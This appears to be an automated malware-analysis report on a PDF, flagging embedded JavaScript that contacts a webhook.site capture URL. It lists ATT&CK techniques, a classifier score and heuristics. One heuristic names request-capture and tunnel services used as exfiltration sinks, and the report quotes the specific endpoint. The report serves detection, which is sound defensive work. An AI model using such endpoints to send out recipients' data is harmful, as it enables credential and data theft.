MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
T1041 Exfiltration Over C2 Channel
The PDF contains embedded JavaScript that attempts to send data to the webhook.site domain. This behavior is indicative of an attempt to exfiltrate information or test an exfiltration channel. The ML classifier strongly flagged this PDF as malicious, supporting the assessment of malicious intent.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
-
PDF links to a request-capture / data-exfiltration sink high PDF_EXFIL_SINK_URLPDF has a clickable HTTP(S) action whose destination is a request-capture / exfiltration endpoint (webhook.site, requestbin, beeceptor, pipedream, interactsh/OAST, burpcollaborator, canarytokens) or a throwaway tunnel (ngrok, trycloudflare). These services exist to receive arbitrary inbound requests, so they are essentially never a legitimate destination for a document link — the file is exfiltrating recipient/credential data or staging C2.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://webhook.site/f485c6c9-2587-4d66-b258-4cd52e1d244a In PDF document text
- https://webhook.site/In PDF document text
Open this report in the interactive analyzer, or submit your own file for analysis.